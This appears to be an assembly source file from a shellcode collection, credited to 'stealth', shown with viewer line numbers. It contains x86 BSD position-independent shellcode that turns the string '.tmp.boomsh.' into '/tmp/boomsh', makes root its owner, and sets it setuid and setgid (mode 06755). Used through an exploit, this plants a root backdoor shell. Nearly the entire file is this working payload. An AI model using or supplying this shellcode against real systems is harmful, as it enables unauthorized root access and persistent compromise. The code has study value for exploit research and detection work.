other/shellkit/x86_bsd/FIXME_chmod.s


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

/* x86/BSD PIC local chmod code
 *
 * by stealth
 */

	.globl cbegin
	.globl cend

cbegin:
	jmp	boomsh

foo:	popl	%ebx
	incl	(%ebx)
	incl	4(%ebx)
	
	xorl	%eax, %eax
	movb	%al, 11(%ebx)
	
	movb	$16, %al	/* chown */
	xorl	%ecx, %ecx
	pushl	%ecx
	pushl	%ecx
	pushl	%ebx
	pushl	$1
sys_1:  int	$0x80
	
	xorl	%eax, %eax	/* chmod */
	movb	$15, %al
	pushw	$06755
	pushl	%ebx
	pushl	$1
sys_2:	int	$0x80
	
	xorl	%eax, %eax
	incl	%eax		/* exit */
	pushl	$1
sys_3:	int	$0x80

boomsh: call foo
	.string ".tmp.boomsh.";
cend: